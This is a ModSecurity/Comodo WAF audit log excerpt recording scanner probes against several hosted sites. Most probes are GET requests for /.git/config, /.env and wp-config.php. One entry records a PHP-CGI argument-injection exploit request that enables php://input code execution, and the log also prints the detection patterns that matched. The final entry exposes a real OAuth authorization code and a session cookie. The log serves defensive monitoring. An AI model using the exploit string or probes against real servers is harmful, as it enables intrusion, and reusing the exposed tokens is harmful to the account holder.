"210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJW-EQ7UIwkHXYqnpzfFAAAAAU"] Stopwatch: 1753372408196573 4355 (- - -) Stopwatch2: 1753372408196573 4355; combined=2514, p1=618, p2=1826, p3=0, p4=0, p5=69, sr=233, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aca2f846-Z-- --68062b2a-A-- [24/Jul/2025:18:53:33.976822 +0300] aIJW_bKGCA5XNnSBpaRaywAAAMQ 195.178.110.68 48554 127.0.0.1 7081 --68062b2a-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 195.178.110.68 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --68062b2a-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --68062b2a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJW_bKGCA5XNnSBpaRaywAAAMQ"] Stopwatch: 1753372413971369 5527 (- - -) Stopwatch2: 1753372413971369 5527; combined=2761, p1=604, p2=2084, p3=0, p4=0, p5=73, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68062b2a-Z-- --09fcd95b-A-- [24/Jul/2025:18:53:39.804349 +0300] aIJXA7KGCA5XNnSBpaRa-QAAAMo 93.123.109.64 49150 127.0.0.1 7081 --09fcd95b-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Baiduspider ( http://www.baidu.com/search/spider.htm) Accept-Charset: utf-8 Accept-Encoding: gzip --09fcd95b-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --09fcd95b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJXA7KGCA5XNnSBpaRa-QAAAMo"] Stopwatch: 1753372419799005 5467 (- - -) Stopwatch2: 1753372419799005 5467; combined=3150, p1=625, p2=2400, p3=0, p4=0, p5=125, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --09fcd95b-Z-- --9165ba70-A-- [24/Jul/2025:18:53:40.133833 +0300] aIJXBLKGCA5XNnSBpaRa-wAAAM4 165.227.173.41 49160 127.0.0.1 7081 --9165ba70-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 165.227.173.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 164 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --9165ba70-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --9165ba70-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||test.casa-eg.com|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions="" \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||test.casa-eg.com|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd cgi.force_redirect=0 \\\\x5cxadd disable_functions=\\\\x22\\\\x22 \\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions=\\\\x22\\\\x22 \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "test.casa-eg.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aIJXBLKGCA5XNnSBpaRa-wAAAM4"] Stopwatch: 1753372420120021 13910 (- - -) Stopwatch2: 1753372420120021 13910; combined=10867, p1=607, p2=10098, p3=0, p4=0, p5=162, sr=185, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9165ba70-Z-- --ed3aca3a-A-- [24/Jul/2025:18:53:40.146245 +0300] aIJXBH3oXrbhF8GAoSS7JQAAABY 93.123.109.64 49172 127.0.0.1 7081 --ed3aca3a-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 11; SM-M515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --ed3aca3a-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --ed3aca3a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJXBH3oXrbhF8GAoSS7JQAAABY"] Stopwatch: 1753372420141751 4614 (- - -) Stopwatch2: 1753372420141751 4614; combined=2696, p1=570, p2=2054, p3=0, p4=0, p5=72, sr=206, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed3aca3a-Z-- --27a12951-A-- [24/Jul/2025:18:53:42.325217 +0300] aIJXBn3oXrbhF8GAoSS7LAAAAAM 165.227.173.41 49382 127.0.0.1 7081 --27a12951-B-- GET /.env HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 165.227.173.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --27a12951-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --27a12951-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.env"] [unique_id "aIJXBn3oXrbhF8GAoSS7LAAAAAM"] Stopwatch: 1753372422321209 4079 (- - -) Stopwatch2: 1753372422321209 4079; combined=2317, p1=483, p2=1750, p3=0, p4=0, p5=83, sr=137, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27a12951-Z-- --f2566d23-A-- [24/Jul/2025:18:53:42.515370 +0300] aIJXBrKGCA5XNnSBpaRbDQAAAMw 165.227.173.41 49398 127.0.0.1 7081 --f2566d23-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 165.227.173.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --f2566d23-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --f2566d23-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJXBrKGCA5XNnSBpaRbDQAAAMw"] Stopwatch: 1753372422509380 6066 (- - -) Stopwatch2: 1753372422509380 6066; combined=4060, p1=2033, p2=1960, p3=0, p4=0, p5=67, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f2566d23-Z-- --ac0d8b5e-A-- [24/Jul/2025:18:53:48.513764 +0300] aIJXDLKGCA5XNnSBpaRbHQAAAMA 93.123.109.64 56496 127.0.0.1 7081 --ac0d8b5e-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3178.0 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --ac0d8b5e-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --ac0d8b5e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJXDLKGCA5XNnSBpaRbHQAAAMA"] Stopwatch: 1753372428509042 4803 (- - -) Stopwatch2: 1753372428509042 4803; combined=2697, p1=729, p2=1899, p3=0, p4=0, p5=69, sr=173, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ac0d8b5e-Z-- --df112e13-A-- [24/Jul/2025:18:54:38.044191 +0300] aIJXPrKGCA5XNnSBpaRckgAAAMg 93.123.109.64 55970 127.0.0.1 7081 --df112e13-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 Accept-Charset: utf-8 Accept-Encoding: gzip --df112e13-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --df112e13-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJXPrKGCA5XNnSBpaRckgAAAMg"] Stopwatch: 1753372478039686 4623 (- - -) Stopwatch2: 1753372478039686 4623; combined=2678, p1=563, p2=2010, p3=0, p4=0, p5=105, sr=211, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df112e13-Z-- --5fdc3804-A-- [24/Jul/2025:18:54:43.009429 +0300] aIJXQ7KGCA5XNnSBpaRcyQAAANg 93.123.109.64 53434 127.0.0.1 7081 --5fdc3804-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4624.0 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --5fdc3804-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --5fdc3804-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJXQ7KGCA5XNnSBpaRcyQAAANg"] Stopwatch: 1753372483004329 5193 (- - -) Stopwatch2: 1753372483004329 5193; combined=3072, p1=682, p2=2304, p3=0, p4=0, p5=86, sr=199, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5fdc3804-Z-- --efaf457a-A-- [24/Jul/2025:19:01:51.721912 +0300] aIJY77KGCA5XNnSBpaRn_AAAANI 213.209.143.116 43440 127.0.0.1 7081 --efaf457a-B-- GET /.env HTTP/1.0 Host: sys.ellaith.com X-Real-IP: 213.209.143.116 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 accept-encoding: gzip --efaf457a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=6283d509336edfb8b99190cf9eac3702; expires=Thu, 24 Jul 2025 17:02:51 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --efaf457a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.ellaith.com"] [uri "/.env"] [unique_id "aIJY77KGCA5XNnSBpaRn_AAAANI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753372911669906 52109 (- - -) Stopwatch2: 1753372911669906 52109; combined=3120, p1=703, p2=2251, p3=0, p4=0, p5=165, sr=185, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --efaf457a-Z-- --48138811-A-- [24/Jul/2025:19:02:03.814943 +0300] aIJY-7KGCA5XNnSBpaRonwAAAMs 52.169.126.102 38048 127.0.0.1 7081 --48138811-B-- GET /hitech-news.com HTTP/1.0 Host: snapcart.io X-Real-IP: 52.169.126.102 X-Accel-Internal: /internal-nginx-static-location Connection: close --48138811-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 16 Mar 2025 19:58:17 GMT ETag: "328-6307b17c198d5" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --48138811-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||snapcart.io|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||snapcart.io|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "snapcart.io"] [uri "/hitech-news.com"] [unique_id "aIJY-7KGCA5XNnSBpaRonwAAAMs"] Stopwatch: 1753372923811125 3893 (- - -) Stopwatch2: 1753372923811125 3893; combined=2250, p1=506, p2=1676, p3=0, p4=0, p5=67, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --48138811-Z-- --ca456965-A-- [24/Jul/2025:19:03:22.154907 +0300] aIJZSrKGCA5XNnSBpaRtNAAAAM8 52.169.126.102 40638 127.0.0.1 7081 --ca456965-B-- GET /wp-includes/css/wp-config.php HTTP/1.0 Host: snapcart.io X-Real-IP: 52.169.126.102 X-Accel-Internal: /internal-nginx-static-location Connection: close --ca456965-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 16 Mar 2025 19:58:17 GMT ETag: "328-6307b17c198d5" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --ca456965-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "snapcart.io"] [uri "/wp-includes/css/wp-config.php"] [unique_id "aIJZSrKGCA5XNnSBpaRtNAAAAM8"] Stopwatch: 1753373002149269 5797 (- - -) Stopwatch2: 1753373002149269 5797; combined=2936, p1=567, p2=2238, p3=0, p4=0, p5=130, sr=217, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ca456965-Z-- --3838b264-A-- [24/Jul/2025:19:03:57.331132 +0300] aIJZbbKGCA5XNnSBpaRuEgAAAM0 52.169.126.102 36530 127.0.0.1 7081 --3838b264-B-- GET /wp-config.php HTTP/1.0 Host: snapcart.io X-Real-IP: 52.169.126.102 X-Accel-Internal: /internal-nginx-static-location Connection: close --3838b264-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --3838b264-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "snapcart.io"] [uri "/wp-config.php"] [unique_id "aIJZbbKGCA5XNnSBpaRuEgAAAM0"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'Primary script unknown' Apache-Handler: proxy:unix:/var/www/vhosts/system/snapcart.io/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753373037325724 5483 (- - -) Stopwatch2: 1753373037325724 5483; combined=2852, p1=655, p2=2025, p3=55, p4=38, p5=79, sr=255, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3838b264-Z-- --adc5bf64-A-- [24/Jul/2025:19:08:54.811333 +0300] aIJalrKGCA5XNnSBpaR30AAAAMs 213.204.92.102 40502 127.0.0.1 7081 --adc5bf64-B-- GET /administration/index.php?code=4/0AVMBsJgbOUewWc18gadFRMt9LEHm1V34O5fhULnzyBG73ndBfwQKugztg1NCw4uS_UyMpw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 213.204.92.102 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=r37o2bhuv1q2c9ak74f488cob2 --adc5bf64-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --adc5bf64-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIJalrKGCA5XNnSBpaR30AAAAMs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753373334374878 436654 (- - -) Stopwatch2: 1753373334374878 436654; combined=4639, p1=510, p2=3811, p3=130, p4=54, p5=134, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --adc5bf64-Z--